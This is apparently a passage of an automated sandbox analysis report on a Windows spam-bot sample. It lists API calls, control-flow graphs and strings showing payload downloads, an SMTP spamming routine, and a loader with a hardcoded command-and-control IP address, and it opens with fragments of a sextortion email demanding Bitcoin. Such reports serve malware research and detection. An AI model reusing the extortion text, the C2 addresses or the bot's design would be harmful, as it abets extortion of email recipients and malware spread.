bad news for you.$Yes, that's how the address looks like, copy and paste my address, it's (cAsE-sEnSEtiVE).$You are given not more than 3 days after you have opened this email.$You can easily buy Bitcoin (BTC) here:$You truly enjoy checking out porn websites and watching dirty videos, while having a lot of kinky fun.$https://bitpay.com/buy-bitcoin/?crypto=BTC$https://cex.io/buy-bitcoins$https://invity.io/buy-crypto$https://nexo.com/buy-crypto/bitcoin-btc$https://paybis.com/
                                                                                • API String ID: 1336957093-1075224888
                                                                                • Opcode ID: f693e9aad8c8987cbde2dd0505fd5e459a6c6c21abfd91df18f15850af5ea3c1
                                                                                • Instruction ID: 60083417c52918bb7be43fe4187682400ab5f2589ccbbb7b9ac812e9862f0ee2
                                                                                • Opcode Fuzzy Hash: f693e9aad8c8987cbde2dd0505fd5e459a6c6c21abfd91df18f15850af5ea3c1
                                                                                • Instruction Fuzzy Hash: 80F1B4B2D40218ABDB14DB94DC42FFE7339AF58305F088698F90C66181F7B59A988F75

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00D7244B
                                                                                • srand.MSVCR90 ref: 00D72452
                                                                                • _wmemset.LIBCPMTD ref: 00D72468
                                                                                • _wmemset.LIBCPMTD ref: 00D7247E
                                                                                • _wmemset.LIBCPMTD ref: 00D72494
                                                                                • _wmemset.LIBCPMTD ref: 00D724AA
                                                                                • memset.MSVCR90 ref: 00D724BE
                                                                                  • Part of subcall function 00D717D0: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00D717E3
                                                                                  • Part of subcall function 00D717D0: InternetOpenUrlA.WININET(00000000,http://icanhazip.com/,00000000,00000000,00000000,00000000), ref: 00D71807
                                                                                  • Part of subcall function 00D717D0: InternetReadFile.WININET(00000000,?,00000063,?), ref: 00D71824
                                                                                  • Part of subcall function 00D717D0: wsprintfA.USER32 ref: 00D71860
                                                                                  • Part of subcall function 00D717D0: InternetCloseHandle.WININET(00000000), ref: 00D71882
                                                                                  • Part of subcall function 00D717D0: InternetCloseHandle.WININET(?), ref: 00D718A1
                                                                                • strcpy.MSVCR90(00D77310,00000000), ref: 00D724D1
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00D724EA
                                                                                • mbstowcs.MSVCR90 ref: 00D72503
                                                                                • wsprintfW.USER32 ref: 00D7251E
                                                                                  • Part of subcall function 00D718D0: memset.MSVCR90 ref: 00D718E2
                                                                                  • Part of subcall function 00D718D0: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36,00000001,00000000,00000000,00000000), ref: 00D718F7
                                                                                  • Part of subcall function 00D718D0: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00D7191A
                                                                                  • Part of subcall function 00D718D0: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00D71949
                                                                                  • Part of subcall function 00D718D0: InternetReadFile.WININET(00000000,00D76F10,000003FF,?), ref: 00D7196A
                                                                                  • Part of subcall function 00D718D0: WriteFile.KERNEL32(000000FF,00D76F10,00000000,?,00000000), ref: 00D7198D
                                                                                  • Part of subcall function 00D718D0: CloseHandle.KERNEL32(000000FF), ref: 00D71999
                                                                                  • Part of subcall function 00D718D0: InternetCloseHandle.WININET(00000000), ref: 00D719BD
                                                                                  • Part of subcall function 00D718D0: InternetCloseHandle.WININET(00000000), ref: 00D719C7
                                                                                • atoi.MSVCR90 ref: 00D7253B
                                                                                • Sleep.KERNEL32(000003E8), ref: 00D7255B
                                                                                • _wmemset.LIBCPMTD ref: 00D7256F
                                                                                • _wmemset.LIBCPMTD ref: 00D72583
                                                                                • rand.MSVCR90 ref: 00D7258B
                                                                                • wsprintfW.USER32 ref: 00D725AE
                                                                                • rand.MSVCR90 ref: 00D725B7
                                                                                • rand.MSVCR90 ref: 00D725CB
                                                                                • rand.MSVCR90 ref: 00D725DF
                                                                                • wsprintfW.USER32 ref: 00D72604
                                                                                  • Part of subcall function 00D718D0: InternetReadFile.WININET(00000000,00D76F10,000003FF,?), ref: 00D719B3
                                                                                • PathFileExistsW.SHLWAPI(00D77508), ref: 00D72628
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00002320,00000000,00000000,00000000), ref: 00D72668
                                                                                • rand.MSVCR90 ref: 00D7266E
                                                                                • Sleep.KERNEL32 ref: 00D7267F
                                                                                • DeleteFileW.KERNEL32(00D77508), ref: 00D7268C
                                                                                • atoi.MSVCR90 ref: 00D726A6
                                                                                • ExitProcess.KERNEL32 ref: 00D726BF
                                                                                • ExitThread.KERNEL32 ref: 00D726CC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$File$_wmemset$CloseHandlerand$Openwsprintf$Read$CreateExitSleepThreadatoimemset$CountDeleteEnvironmentExistsExpandPathProcessStringsTickWritembstowcssrandstrcpy
                                                                                • String ID: %s%d.txt$%s\%d%d%d.jpg$%sn.txt$%temp%$^Iu
                                                                                • API String ID: 3135460431-1377136663
                                                                                • Opcode ID: 19c459ad6bf287fcb317536939e963bcb7a626cd642cd9515c200bbfe5ca6fff
                                                                                • Instruction ID: 85f67ef8547ce4c7ed95e9122e4f29fadbf17b94c60d7819d7a76dfef529df2b
                                                                                • Opcode Fuzzy Hash: 19c459ad6bf287fcb317536939e963bcb7a626cd642cd9515c200bbfe5ca6fff
                                                                                • Instruction Fuzzy Hash: DA5172B5D80344ABE710BB609C4BFEA3329EB54705F048469F64DA52C2FEB55688CA72

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 230 d718d0-d71904 memset InternetOpenW 231 d719c3-d719d5 InternetCloseHandle 230->231 232 d7190a-d71927 InternetOpenUrlW 230->232 233 d7192d-d71934 232->233 234 d719b9-d719bd InternetCloseHandle 232->234 235 d71936-d71956 CreateFileW 233->235 236 d719a1-d719b3 InternetReadFile 233->236 234->231 237 d7199f 235->237 238 d71958-d71972 InternetReadFile 235->238 236->234 237->234 239 d71995-d71999 CloseHandle 238->239 240 d71974-d71978 238->240 239->237 240->239 241 d7197a-d71993 WriteFile 240->241 241->238
                                                                                APIs
                                                                                • memset.MSVCR90 ref: 00D718E2
                                                                                • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36,00000001,00000000,00000000,00000000), ref: 00D718F7
                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00D7191A
                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00D71949
                                                                                • InternetReadFile.WININET(00000000,00D76F10,000003FF,?), ref: 00D7196A
                                                                                • WriteFile.KERNEL32(000000FF,00D76F10,00000000,?,00000000), ref: 00D7198D
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 00D71999
                                                                                • InternetReadFile.WININET(00000000,00D76F10,000003FF,?), ref: 00D719B3
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00D719BD
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00D719C7
                                                                                Strings
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36, xrefs: 00D718F2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$File$CloseHandle$OpenRead$CreateWritememset
                                                                                • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
                                                                                • API String ID: 4022733741-2132150883
                                                                                • Opcode ID: c76abbe703dc41675ff05990482401da1997fe7efa432ffd52558fd9e2ea195f
                                                                                • Instruction ID: 3fb1abb827e196669b71af9b9e03d587e26537c6c0dc7963bf19173df685e14a
                                                                                • Opcode Fuzzy Hash: c76abbe703dc41675ff05990482401da1997fe7efa432ffd52558fd9e2ea195f
                                                                                • Instruction Fuzzy Hash: 57312174A40304FBDB14DB94DC5AFAEB774AB44700F648514F719AA2D0F7B09A44CB71

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 242 d71b2d-d71b3c StrStrA 243 d71b60-d71b7a wsprintfA 242->243 244 d71b3e-d71b5e wsprintfA 242->244 245 d71b80-d71b91 243->245 244->245 246 d71b92 call d71120 245->246 247 d71b97-d71b9c 246->247 248 d71b9e-d71ba5 247->248 249 d71baa-d71bb1 247->249 250 d722ac 248->250 249->250 252 d722b1-d722d9 shutdown closesocket 250->252 253 d71a9a-d71a9e 250->253 253->252 255 d71aa4-d71ab3 253->255 257 d71ab4 call d71160 255->257 258 d71ab9-d71ac9 257->258 259 d71ad0-d71aef call d711c0 258->259 260 d71acb 258->260 263 d71af6-d71b15 259->263 264 d71af1 259->264 260->252 263->250 265 d71b1b 263->265 264->252 265->250
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: wsprintf$closesocketshutdown
                                                                                • String ID: EHLO %s$HELO %s
                                                                                • API String ID: 4205972133-3160789797
                                                                                • Opcode ID: 10183935c51cebb398967900b579fa85ebe8760054c8d056db4345851e414546
                                                                                • Instruction ID: 52526c86ecdf6bd2acdac5311b72ac904f8d15b44b7873557a74cd06e0f551bc
                                                                                • Opcode Fuzzy Hash: 10183935c51cebb398967900b579fa85ebe8760054c8d056db4345851e414546
                                                                                • Instruction Fuzzy Hash: 0C214CB5D00318EFCB10DBA4DC49BAEB778BB44704F0486A9EA0DA2241F7749594CB78

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 266 d72320-d72357 GetTickCount srand _wfopen 267 d723e6-d7240b call d71400 call d718b0 266->267 268 d7235d 266->268 278 d7240d-d72419 call d719e0 267->278 279 d7241c-d7241e ExitThread 267->279 269 d72367-d72384 fgets 268->269 271 d723d7-d723e3 fclose 269->271 272 d72386-d723bd rand 269->272 271->267 275 d723d5 272->275 276 d723bf-d723d2 strcpy 272->276 275->269 276->275 278->279
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: CountExitThreadTick_wfopenfclosefgetsrandsrandstrcpy
                                                                                • String ID:
                                                                                • API String ID: 3964472883-0
                                                                                • Opcode ID: 9011f00c698843e5b12c4dec29ee109088c7be816951b5b83033704e0af0e5a2
                                                                                • Instruction ID: 8ecbccad7d3cc7be2924fedd41fecc47d8b22742ec129ff63674645abff78e45
                                                                                • Opcode Fuzzy Hash: 9011f00c698843e5b12c4dec29ee109088c7be816951b5b83033704e0af0e5a2
                                                                                • Instruction Fuzzy Hash: 702166B5C8021C97DB20A760DD8ABE97238EB20305F4485E8E50D61241FB759BD8CFB2

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 282 d71bb6-d71c02 wsprintfA * 2 283 d71c03 call d71120 282->283 284 d71c08-d71c0d 283->284 285 d71c0f-d71c16 284->285 286 d71c1b-d71c22 284->286 287 d722ac 285->287 286->287 289 d722b1-d722d9 shutdown closesocket 287->289 290 d71a9a-d71a9e 287->290 290->289 292 d71aa4-d71ab3 290->292 294 d71ab4 call d71160 292->294 295 d71ab9-d71ac9 294->295 296 d71ad0-d71aef call d711c0 295->296 297 d71acb 295->297 300 d71af6-d71b15 296->300 301 d71af1 296->301 297->289 300->287 302 d71b1b 300->302 301->289 302->287
                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 00D71BC6
                                                                                • wsprintfA.USER32 ref: 00D71BE2
                                                                                  • Part of subcall function 00D71120: lstrlenA.KERNEL32(?), ref: 00D7112D
                                                                                  • Part of subcall function 00D71120: send.WS2_32(?,?,000000FF,00000000), ref: 00D71144
                                                                                • shutdown.WS2_32(000000FF,00000002), ref: 00D722C3
                                                                                • closesocket.WS2_32(000000FF), ref: 00D722CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: wsprintf$closesocketlstrlensendshutdown
                                                                                • String ID: <%s>$MAIL FROM: %s
                                                                                • API String ID: 1146405-791590210
                                                                                • Opcode ID: 821f4e20a40b2b2695b0b94a464f24d47344071677a257f852b6a741cd63fd5d
                                                                                • Instruction ID: 599651c4e86015a1fcad0917d908cc472cdba0bc818ab4c943da5b33cac0f976
                                                                                • Opcode Fuzzy Hash: 821f4e20a40b2b2695b0b94a464f24d47344071677a257f852b6a741cd63fd5d
                                                                                • Instruction Fuzzy Hash: 1C21DEB5D002189FCF11DB98DC49BEEB778BB44304F4481A9EA0DA6241F7749994CB75

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 303 d71320-d71340 GetTickCount srand 304 d7134b-d71351 303->304 305 d71353-d71376 rand sprintf 304->305 306 d71378-d71387 304->306 305->304
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: CountTickrandsprintfsrand
                                                                                • String ID: %s%d
                                                                                • API String ID: 2526408171-1110647743
                                                                                • Opcode ID: 6df7dfcacbe68101792d455d9234c167510d19c3ae1a4f4368850c0771820b18
                                                                                • Instruction ID: 9e39401b78c96a1dcb2364fd8daa6dc04505b1af675db72470c937e466774638
                                                                                • Opcode Fuzzy Hash: 6df7dfcacbe68101792d455d9234c167510d19c3ae1a4f4368850c0771820b18
                                                                                • Instruction Fuzzy Hash: D5F014B4A04248EBDB05DB98C982B6D77A5EB95300F10C189F80D4B341E771AE009BB6

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 308 d719e0-d71a05 call d72300 311 d722d3-d722d9 308->311 312 d71a0b-d71a26 call d710a0 308->312 312->311 315 d71a2c-d71a3f socket 312->315 315->311 316 d71a45-d71a49 315->316 316->311 317 d71a4f-d71a62 connect 316->317 318 d722bd-d722cd shutdown closesocket 317->318 319 d71a68-d71a89 setsockopt 317->319 318->311 320 d71a90-d71a94 319->320 321 d722b1-d722ba 320->321 322 d71a9a-d71a9e 320->322 321->318 322->321 323 d71aa4-d71ac9 call d71160 322->323 326 d71ad0-d71aef call d711c0 323->326 327 d71acb 323->327 330 d71af6-d71b15 326->330 331 d71af1 326->331 327->321 332 d722ac 330->332 333 d71b1b 330->333 331->321 332->320 333->332
                                                                                APIs
                                                                                  • Part of subcall function 00D72300: strchr.MSVCR90 ref: 00D7230B
                                                                                  • Part of subcall function 00D710A0: DnsQuery_A.DNSAPI(00000000,0000000F,00000000,00000000,00000000,00000000), ref: 00D710C4
                                                                                  • Part of subcall function 00D710A0: htons.WS2_32(00000019), ref: 00D710F5
                                                                                  • Part of subcall function 00D710A0: DnsFree.DNSAPI(00000000,00000001), ref: 00D7110F
                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 00D71A32
                                                                                • connect.WS2_32(000000FF,?,00000010), ref: 00D71A59
                                                                                • setsockopt.WS2_32(000000FF,00000006,00000001,00000001,00000004), ref: 00D71A83
                                                                                • shutdown.WS2_32(000000FF,00000002), ref: 00D722C3
                                                                                • closesocket.WS2_32(000000FF), ref: 00D722CD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: FreeQuery_closesocketconnecthtonssetsockoptshutdownsocketstrchr
                                                                                • String ID:
                                                                                • API String ID: 3655475579-0
                                                                                • Opcode ID: 33d8b817bcb7d7874506a39d4fb17f995e8c891364af01ecf007c88d331e47b9
                                                                                • Instruction ID: 428fd21aba8d388f9aacd1addba147b5b230d9030fcba57a837e967e2858e543
                                                                                • Opcode Fuzzy Hash: 33d8b817bcb7d7874506a39d4fb17f995e8c891364af01ecf007c88d331e47b9
                                                                                • Instruction Fuzzy Hash: AE415D75D00318DFDB10DBA8DC49BEEB779BB04304F048298EA1DA6281F7749A85CFA5
                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 00D71C37
                                                                                  • Part of subcall function 00D71120: lstrlenA.KERNEL32(?), ref: 00D7112D
                                                                                  • Part of subcall function 00D71120: send.WS2_32(?,?,000000FF,00000000), ref: 00D71144
                                                                                • shutdown.WS2_32(000000FF,00000002), ref: 00D722C3
                                                                                • closesocket.WS2_32(000000FF), ref: 00D722CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: closesocketlstrlensendshutdownwsprintf
                                                                                • String ID: RCPT TO: <%s>
                                                                                • API String ID: 1492768164-1854338671
                                                                                • Opcode ID: 8d371442a549b991445b0ac54fa12cb85b00a0bcd48e5e97c04d5ed91d2d1d68
                                                                                • Instruction ID: 6c2968a6c01e163972150b197c95a9d44258ac13a337ec2a6b48c84a72d65b68
                                                                                • Opcode Fuzzy Hash: 8d371442a549b991445b0ac54fa12cb85b00a0bcd48e5e97c04d5ed91d2d1d68
                                                                                • Instruction Fuzzy Hash: 1C11FEB5D00218DFCF10DB94DC49BAEB778BB48345F0482A9E90DA6241F7749994CF79
                                                                                APIs
                                                                                • StrCmpNA.SHLWAPI(354,220,00000003), ref: 00D71208
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 220$250$354
                                                                                • API String ID: 0-1679323658
                                                                                • Opcode ID: fe149fa031a68f0834c1c1338f95e360a3ab7b1a1abba1beeaf8d4e07452f581
                                                                                • Instruction ID: 37c3a6f82e73636d13ce4d962c0e9c9343704ee415dfd8d8bc72e85701efa223
                                                                                • Opcode Fuzzy Hash: fe149fa031a68f0834c1c1338f95e360a3ab7b1a1abba1beeaf8d4e07452f581
                                                                                • Instruction Fuzzy Hash: 4DF04974905309DBCF00EFD8DA497AEBBB4BB00304F608659D909AB340E3709B44DBB5
                                                                                APIs
                                                                                  • Part of subcall function 00D71120: lstrlenA.KERNEL32(?), ref: 00D7112D
                                                                                  • Part of subcall function 00D71120: send.WS2_32(?,?,000000FF,00000000), ref: 00D71144
                                                                                • shutdown.WS2_32(000000FF,00000002), ref: 00D722C3
                                                                                • closesocket.WS2_32(000000FF), ref: 00D722CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: closesocketlstrlensendshutdown
                                                                                • String ID: DATA
                                                                                • API String ID: 317823648-550793329
                                                                                • Opcode ID: 969fd7ebd1d24c49d0e41b1066fd163fbf1f166c5c90aa3c4bd685bc9e17ac14
                                                                                • Instruction ID: a043ed6028e90e66bb3887c9dd5cfa0b99d2f087e3dc53cb5df90b174fc26dc6
                                                                                • Opcode Fuzzy Hash: 969fd7ebd1d24c49d0e41b1066fd163fbf1f166c5c90aa3c4bd685bc9e17ac14
                                                                                • Instruction Fuzzy Hash: FE014CB5D00318EFCF009BA4DC497AEB778BB04344F048259E909B6291F7788484CB35
                                                                                APIs
                                                                                  • Part of subcall function 00D71120: lstrlenA.KERNEL32(?), ref: 00D7112D
                                                                                  • Part of subcall function 00D71120: send.WS2_32(?,?,000000FF,00000000), ref: 00D71144
                                                                                • shutdown.WS2_32(000000FF,00000002), ref: 00D722C3
                                                                                • closesocket.WS2_32(000000FF), ref: 00D722CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: closesocketlstrlensendshutdown
                                                                                • String ID: QUIT
                                                                                • API String ID: 317823648-1967077921
                                                                                • Opcode ID: f19bc1594a8eb87d9df464cc4b2bd119a4f61f71e52192565459f02000c8d23b
                                                                                • Instruction ID: 6eb4b539df615e71bb6a037c9a6569ad9bfd3fa0f7000651c782fb1589c5f059
                                                                                • Opcode Fuzzy Hash: f19bc1594a8eb87d9df464cc4b2bd119a4f61f71e52192565459f02000c8d23b
                                                                                • Instruction Fuzzy Hash: C001FF75D00318AFCF10DBA4DC49BADB778BB04355F048269E959B6281F7788585CB35

                                                                                Callgraph

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 3910a0-3910b8 Sleep call 391000 3 3910ba-391117 DeleteUrlCacheEntry * 9 0->3 4 39111d-391120 0->4 3->4
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 003910A8
                                                                                  • Part of subcall function 00391000: ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 0039101A
                                                                                  • Part of subcall function 00391000: wsprintfW.USER32 ref: 00391033
                                                                                  • Part of subcall function 00391000: PathFileExistsW.KERNELBASE(?), ref: 00391043
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/1), ref: 003910BF
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/2), ref: 003910CA
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/3), ref: 003910D5
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/4), ref: 003910E0
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/5), ref: 003910EB
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/6), ref: 003910F6
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/_1), ref: 00391101
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/_2), ref: 0039110C
                                                                                • DeleteUrlCacheEntry.WININET(http://185.215.113.66/_3), ref: 00391117
                                                                                Strings
                                                                                • http://185.215.113.66/2, xrefs: 003910C5
                                                                                • http://185.215.113.66/5, xrefs: 003910E6
                                                                                • http://185.215.113.66/_3, xrefs: 00391112
                                                                                • http://185.215.113.66/4, xrefs: 003910DB
                                                                                • http://185.215.113.66/1, xrefs: 003910BA
